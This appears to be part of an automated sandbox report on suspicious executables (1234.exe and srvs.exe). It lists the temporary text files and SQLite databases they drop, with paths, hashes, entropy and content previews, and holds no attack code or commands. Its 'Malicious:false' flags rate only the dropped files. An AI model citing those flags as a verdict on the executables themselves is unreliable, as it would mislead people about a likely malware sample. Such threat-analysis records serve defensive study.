                                                                                                                                                                                              SHA-256:E01ADE9C56AF2361A5ADC05ADE2F5727DF1B80311A0FDC6F15B2E0FFFACC9067
                                                                                                                                                                                              SHA-512:0521ED245FA8F46DE9502CD53F5A50B01B4E83983CC6D9DE0CF02E54D2825C1C26A748CC27E24633DA1171CE0309323235ECF7EB536D4058214D7618794CF2FA
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: PWCCAWLGRESZQJYMKOMIHTZVFVPFCSAZVTKGMPWIGSDMTLFZQLHJERDPYZCJGFCRLISWNBAMIMDXCWDVGVLWLRBEVYOOPHYWACKPZXSURGSIFWTFUJKLSAQNAJEWDLUIKFHXLUAMUDGRAVFMICAHEZBIIEGWGAVVJHMHSIBGNLEHYVSOKQMYABDYCPEBOGBMYUCIGVRGYYQRAYNYHAIBMHOTRIZLLYBECMXTCFUOVXXHSEMIUWSBDHOZIZZUXFTLKXXNEMXBKLCQDPKVZNOMDYUYJRWCVILZVJDNNBMPTNOFSKRQTILJRXTKDNUIYSQCAOPCQKTXYXPPGZDZOQYLGYFPFIWNBSQZXYABPTNBJQNBZEETJSFXZNHXBRWUHOMCZAGZQJLNPMZFALBBPHBIXZHLBTBJLTUHPUYVUDWDFJANSIIDJVMUYLPZPYGAJWMTOHGILQWHKJDQUWMTSWIBVVZGAHCNWIFZNGNERRKMSIVXWXEXRZZEWYASCIYJYCOOBWRTNZELPWKFVZKZIBGQBLGCTSTNAJSWPHYJCQSYZVFRYFSRAVVXJIOHQCNVEOIMWPEAVCJLBHRUKDHJWPFMXAKTZVQCOUKYCBZFWBREKKHOHZVNMMJZGWIZEYRAIKTHMJRCWVWKNMJNSZHSDRUZSQOJKCTOSNGKOKEAWUIQNIYHWKIIDHKQIJWCSGRRLEVUTENXSNNVDVYDJTIWYNCAZIEBXMIROLIBTLMGEUOCECFFWLENTJSVHFKQHKAPBXQAJJSUOUSFCBQTHCFYZGSVVAUPLQELRWLXRCZSUSFUBCORCWMJPUNHTEEYODSFGJFTDZLLXMQYMIHIZXOYGABIAWYSBWLAJSCKBWGJBVMMJKBKLUHULJIUHQXIXESAUTNVVZNKMIVIOHPPQAWTQSEHTQMIWNPRZRETXZHRGWOTGIEHCCSGIUCKCIFCQPTAJOFCIMYSMCOPGASEEYCNQLXCNRAPQUSQXTWPKPYCQXPE
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp253C.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1026
                                                                                                                                                                                              Entropy (8bit):4.702247102869977
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
                                                                                                                                                                                              MD5:B734D7226D90E4FD8228EE89C7DD26DA
                                                                                                                                                                                              SHA1:EDA7F371036A56A0DE687FF97B01F355C5060846
                                                                                                                                                                                              SHA-256:ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
                                                                                                                                                                                              SHA-512:D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp256C.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1026
                                                                                                                                                                                              Entropy (8bit):4.69422273140364
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
                                                                                                                                                                                              MD5:A686C2E2230002C3810CB3638589BF01
                                                                                                                                                                                              SHA1:4B764DD14070E52A2AC0458F401CDD5724E714FB
                                                                                                                                                                                              SHA-256:38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
                                                                                                                                                                                              SHA-512:1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp256D.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1026
                                                                                                                                                                                              Entropy (8bit):4.685942106278079
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
                                                                                                                                                                                              MD5:3F6896A097F6B0AE6A2BF3826C813DFC
                                                                                                                                                                                              SHA1:951214AB37DEA766005DD981B0B3D61F936B035B
                                                                                                                                                                                              SHA-256:E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
                                                                                                                                                                                              SHA-512:C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp256E.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1026
                                                                                                                                                                                              Entropy (8bit):4.6969712158039245
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:zDLHcjI8IQ6sNUYzo1jfRRMF6zzC3ZzNTWx7M00:zDL4ImUYzebRR66C3Z0JMR
                                                                                                                                                                                              MD5:31CD00400A977C512B9F1AF51F2A5F90
                                                                                                                                                                                              SHA1:3A6B9ED88BD73091D5685A51CB4C8870315C4A81
                                                                                                                                                                                              SHA-256:E01ADE9C56AF2361A5ADC05ADE2F5727DF1B80311A0FDC6F15B2E0FFFACC9067
                                                                                                                                                                                              SHA-512:0521ED245FA8F46DE9502CD53F5A50B01B4E83983CC6D9DE0CF02E54D2825C1C26A748CC27E24633DA1171CE0309323235ECF7EB536D4058214D7618794CF2FA
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: PWCCAWLGRESZQJYMKOMIHTZVFVPFCSAZVTKGMPWIGSDMTLFZQLHJERDPYZCJGFCRLISWNBAMIMDXCWDVGVLWLRBEVYOOPHYWACKPZXSURGSIFWTFUJKLSAQNAJEWDLUIKFHXLUAMUDGRAVFMICAHEZBIIEGWGAVVJHMHSIBGNLEHYVSOKQMYABDYCPEBOGBMYUCIGVRGYYQRAYNYHAIBMHOTRIZLLYBECMXTCFUOVXXHSEMIUWSBDHOZIZZUXFTLKXXNEMXBKLCQDPKVZNOMDYUYJRWCVILZVJDNNBMPTNOFSKRQTILJRXTKDNUIYSQCAOPCQKTXYXPPGZDZOQYLGYFPFIWNBSQZXYABPTNBJQNBZEETJSFXZNHXBRWUHOMCZAGZQJLNPMZFALBBPHBIXZHLBTBJLTUHPUYVUDWDFJANSIIDJVMUYLPZPYGAJWMTOHGILQWHKJDQUWMTSWIBVVZGAHCNWIFZNGNERRKMSIVXWXEXRZZEWYASCIYJYCOOBWRTNZELPWKFVZKZIBGQBLGCTSTNAJSWPHYJCQSYZVFRYFSRAVVXJIOHQCNVEOIMWPEAVCJLBHRUKDHJWPFMXAKTZVQCOUKYCBZFWBREKKHOHZVNMMJZGWIZEYRAIKTHMJRCWVWKNMJNSZHSDRUZSQOJKCTOSNGKOKEAWUIQNIYHWKIIDHKQIJWCSGRRLEVUTENXSNNVDVYDJTIWYNCAZIEBXMIROLIBTLMGEUOCECFFWLENTJSVHFKQHKAPBXQAJJSUOUSFCBQTHCFYZGSVVAUPLQELRWLXRCZSUSFUBCORCWMJPUNHTEEYODSFGJFTDZLLXMQYMIHIZXOYGABIAWYSBWLAJSCKBWGJBVMMJKBKLUHULJIUHQXIXESAUTNVVZNKMIVIOHPPQAWTQSEHTQMIWNPRZRETXZHRGWOTGIEHCCSGIUCKCIFCQPTAJOFCIMYSMCOPGASEEYCNQLXCNRAPQUSQXTWPKPYCQXPE
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp256F.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1026
                                                                                                                                                                                              Entropy (8bit):4.702247102869977
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
                                                                                                                                                                                              MD5:B734D7226D90E4FD8228EE89C7DD26DA
                                                                                                                                                                                              SHA1:EDA7F371036A56A0DE687FF97B01F355C5060846
                                                                                                                                                                                              SHA-256:ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
                                                                                                                                                                                              SHA-512:D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp2570.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1026
                                                                                                                                                                                              Entropy (8bit):4.69422273140364
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
                                                                                                                                                                                              MD5:A686C2E2230002C3810CB3638589BF01
                                                                                                                                                                                              SHA1:4B764DD14070E52A2AC0458F401CDD5724E714FB
                                                                                                                                                                                              SHA-256:38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
                                                                                                                                                                                              SHA-512:1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp4F3C.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                              Entropy (8bit):0.792852251086831
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                              MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                              SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                              SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                              SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp4F4D.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                              Entropy (8bit):0.792852251086831
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                              MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                              SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                              SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                              SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp55BC.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp55FB.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp742B.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                              Entropy (8bit):0.792852251086831
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                              MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                              SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                              SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                              SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp850C.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                              Entropy (8bit):0.792852251086831
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                              MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                              SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                              SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                              SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp850D.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                              Entropy (8bit):0.792852251086831
